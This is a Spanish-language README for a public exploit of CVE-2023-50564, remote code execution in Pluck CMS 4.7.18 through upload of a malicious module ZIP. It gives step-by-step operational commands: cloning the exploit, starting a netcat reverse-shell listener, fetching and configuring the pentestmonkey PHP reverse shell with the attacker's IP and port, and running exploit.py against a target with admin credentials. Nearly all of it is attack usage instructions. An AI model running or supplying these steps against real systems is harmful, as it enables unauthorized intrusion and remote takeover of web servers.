
Pluck v4.7.18 - Ejecución Remota de Código (RCE)
Este exploit permite a un administrador autenticado en Pluck CMS v4.7.18 cargar un módulo ZIP malicioso que contiene un shell PHP, resultando en ejecución remota de código (RCE).
installmodulegit clone https://github.com/glynzr/CVE-2023-50564.git
cd CVE-2023-50564
pip3 install -r requirements.txt
python3 exploit.py -h
python3 exploit.py -t <target> -u <username> -pass <password> -path <path_to_php_shell> [-p <port>]
Primero, se debe iniciar el listener de reverse shell en la máquina atacante (esta pestaña del terminal no debe cerrarse):
nc -nvlp <specify port>
Luego, descarga el reverse shell PHP desde https://github.com/pentestmonkey/php-reverse-shell y personalízalo según la máquina atacante. (IP, puerto)
Ejecuta el código del exploit en otra pestaña:
python3 exploit.py -t test.com -u admin -pass samplepassword -path ../php-reverse-shell.php